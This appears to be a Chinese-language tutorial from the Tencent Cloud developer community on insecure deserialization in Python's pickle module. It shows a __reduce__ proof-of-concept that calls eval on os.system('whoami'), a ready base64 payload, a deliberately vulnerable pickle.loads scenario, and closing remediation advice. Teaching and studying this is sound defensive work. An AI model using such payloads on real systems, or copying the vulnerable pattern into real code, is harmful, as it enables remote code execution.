前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >【WEB安全】不安全的反序列化

【WEB安全】不安全的反序列化

原创
作者头像
用户1709153
发布2023-05-23 10:40:57
2800
发布2023-05-23 10:40:57
举报
文章被收录于专栏:杂学杂学

1.1. 什么是序列化和反序列化

序列化和反序列化是指用于将对象或数据结构转换为字节流的过程,以便在不同系统之间进行传输或存储,并在需要时重新构造。

**序列化是指将对象或数据结构转换为字节流的过程。**在序列化过程中,对象的状态和数据被转换为一系列字节,这些字节可以按照一定的协议进行传输或存储。序列化通常用于将对象存储到磁盘或通过网络发送到其他系统。序列化后的字节流可以被保存下来,以后可以通过反序列化操作重新构建对象并恢复其状态和数据。

**反序列化是指将序列化后的字节流转换回对象或数据结构的过程。**在反序列化过程中,字节流被读取并解析,以还原为原始的对象或数据结构。反序列化通常用于从磁盘加载保存的对象或接收通过网络传输的序列化数据。通过反序列化,可以重新构建对象并恢复其之前序列化的状态和数据。

序列化和反序列化在许多领域都有广泛的应用,例如分布式系统、持久化存储、缓存机制以及跨平台通信。它们允许将复杂的对象或数据结构转换为字节流进行传输或存储,从而实现不同系统之间的数据交换和共享。

1.2. 漏洞介绍

不安全的反序列化是指在反序列化过程中存在潜在安全风险的情况,如果序列化的内容可控,在传递给应用进行反序列化时,可能会导致执行恶意代码或触发其他不受控制的行为。

以下是一些常见的不安全反序列化的情况:

  1. **不受限制的反序列化**:如果反序列化操作没有适当的验证和限制,允许任意的序列化数据被反序列化,攻击者可以构造恶意的序列化数据来执行恶意代码。
  2. **未经过滤的输入**:如果反序列化操作接受未经过滤的输入数据,攻击者可以通过构造特定的恶意数据来执行命令或导致不受控制的行为。
  3. **自定义的反序列化逻辑**:如果使用自定义的反序列化逻辑而不是使用安全的序列化库或框架,可能会导致安全问题。自定义逻辑可能缺乏必要的安全验证和过滤步骤,从而容易受到攻击。
  4. **恶意的序列化数据**:如果攻击者能够在反序列化操作中提供恶意构造的序列化数据,可能会导致命令执行或其他不受控制的行为。

1.3. 复现过程

网上大多是采用的php进行复现,一搜一大堆,这里我们用Python的pickle模块来进行复现。

1.3.1. pickle模块介绍

参考 doc,可见是一个序列化模块。

pickle doc
pickle doc

基础使用如下:

代码语言:python
代码运行次数:0
复制
import pickle

# 定义一个对象
class Person:
    def \_\_init\_\_(self, name, age):
        self.name = name
        self.age = age

# 创建一个 Person 对象
person = Person("d4m1ts", 18)

# 序列化对象
serialized\_data = pickle.dumps(person)

# 序列化后的二进制数据
print(f"序列化后的数据: {serialized\_data}", end="\n\n")

# 反序列化数据
deserialized\_person = pickle.loads(serialized\_data)

# 访问反序列化后的对象属性
print(f"反序列化后的对象所属类: {deserialized\_person.\_\_class\_\_}")
print(f"name: {deserialized\_person.name}")  # 输出: d4m1ts
print(f"age: {deserialized\_person.age}")  # 输出: 18
data
data

1.3.2. 魔术方法 __reduce__()

在Python中,\_\_reduce\_\_()是一个特殊方法,用于定义对象的序列化行为。当使用pickle模块对对象进行序列化和反序列化时,\_\_reduce\_\_()方法会被调用。

\_\_reduce\_\_()方法应该返回一个元组(),其中包含两个或三个元素。元组的第一个元素是用于重新构建对象的函数,第二个元素是传递给构建函数的参数(通常是一个元组),而第三个元素(可选)是用于恢复对象状态的可迭代对象。

简单来说,我们可以通过重写\_\_reduse\_\_()函数,来修改数据反序列化的方式。

修改刚才的代码,举例如下:

代码语言:python
代码运行次数:0
复制
import pickle

# 定义一个对象
class Person:
    def \_\_init\_\_(self, name, age):
        self.name = name
        self.age = age

    def \_\_reduce\_\_(self):
        print("Calling \_\_reduce\_\_()")
        # return (self.\_\_class\_\_, (self.value,))
        return (print, ("reduse poc test",))


# 创建一个 Person 对象
person = Person("d4m1ts", 18)

# 序列化对象
serialized\_data = pickle.dumps(person)

# 序列化后的二进制数据
print(f"序列化后的数据: {serialized\_data}", end="\n\n")

# 反序列化数据
deserialized\_person = pickle.loads(serialized\_data)

# 访问反序列化后的对象属性
print(f"反序列化后的对象所属类: {deserialized\_person.\_\_class\_\_}")
print(f"name: {deserialized\_person.name}")  # 输出: d4m1ts
print(f"age: {deserialized\_person.age}")  # 输出: 18

可见在反序列化的时候,调用的是我们重写时用的print方法。

unser
unser

1.3.3. 漏洞场景举例复现

假设漏洞场景代码如下,其中userInput是我们可以控制输入的地方:

代码语言:python
代码运行次数:0
复制
import pickle
import base64

class Person:
    def \_\_init\_\_(self, name, age):
        self.name = name
        self.age = age

userInput = ""
deserialized\_person = pickle.loads(base64.b64decode(userInput))
print(f"反序列化后的对象所属类: {deserialized\_person.\_\_class\_\_}")

根据上述代码,构造POC代码,生成序列化的内容,其中编写\_\_reduse\_\_()函数如下:

代码语言:python
代码运行次数:0
复制
import pickle
import base64

class Person:
    def \_\_init\_\_(self, name, age):
        self.name = name
        self.age = age

    def \_\_reduce\_\_(self):
        return (eval, ('\_\_import\_\_("os").system("whoami")',))


person = Person("d4m1ts", 18)
serialized\_data = pickle.dumps(person)
print(base64.b64encode(serialized\_data).decode())

得到payload为: gANjYnVpbHRpbnMKZXZhbApxAFghAAAAX19pbXBvcnRfXygib3MiKS5zeXN0ZW0oIndob2FtaSIpcQGFcQJScQMu

把payload插入漏洞场景测试一下:

代码语言:python
代码运行次数:0
复制
import pickle
import base64

class Person:
    def \_\_init\_\_(self, name, age):
        self.name = name
        self.age = age

userInput = "gANjYnVpbHRpbnMKZXZhbApxAFghAAAAX19pbXBvcnRfXygib3MiKS5zeXN0ZW0oIndob2FtaSIpcQGFcQJScQMu"
deserialized\_person = pickle.loads(base64.b64decode(userInput))
print(f"反序列化后的对象所属类: {deserialized\_person.\_\_class\_\_}")
success
success

可见成功执行了系统命令。

总结一下复现过程,就是写一个\_\_reduse\_\_函数来改变反序列化的行为即可。

1.4. 漏洞危害

  1. 远程代码执行:攻击者可以通过构造恶意序列化数据注入和执行任意代码,从而完全控制目标系统,并执行恶意操作。
  2. 远程命令执行:攻击者可以通过反序列化漏洞在目标系统上执行远程命令,从而对其他系统或网络资源造成进一步的威胁。
  3. 信息泄露:攻击者可以利用反序列化漏洞读取和获取目标系统中的敏感信息,例如数据库凭据、用户密码、加密密钥等。
  4. 拒绝服务(DoS)攻击:攻击者可以发送恶意序列化数据来触发异常或消耗过多的系统资源,导致系统崩溃或无法提供正常的服务。

1.5. 修复建议

  • 使用安全的序列化库或框架,这些库经过严格测试和审查,并提供了适当的安全防护机制。
  • 对反序列化输入进行严格的验证和过滤,只接受预期的数据格式和内容。
  • 不要从不受信任的来源接受序列化数据,尽量限制数据来源。
  • 定期更新和修复序列化库和相关组件,以获取最新的安全修补程序。
  • 配置系统和应用程序的安全设置,限制恶意代码执行的可能性。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 1.1. 什么是序列化和反序列化
  • 1.2. 漏洞介绍
  • 1.3. 复现过程
    • 1.3.1. pickle模块介绍
      • 1.3.2. 魔术方法 __reduce__()
        • 1.3.3. 漏洞场景举例复现
        • 1.4. 漏洞危害
        • 1.5. 修复建议
        相关产品与服务
        对象存储
        对象存储(Cloud Object Storage,COS)是由腾讯云推出的无目录层次结构、无数据格式限制,可容纳海量数据且支持 HTTP/HTTPS 协议访问的分布式存储服务。腾讯云 COS 的存储桶空间无容量上限,无需分区管理,适用于 CDN 数据分发、数据万象处理或大数据计算与分析的数据湖等多种场景。
        领券
        问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档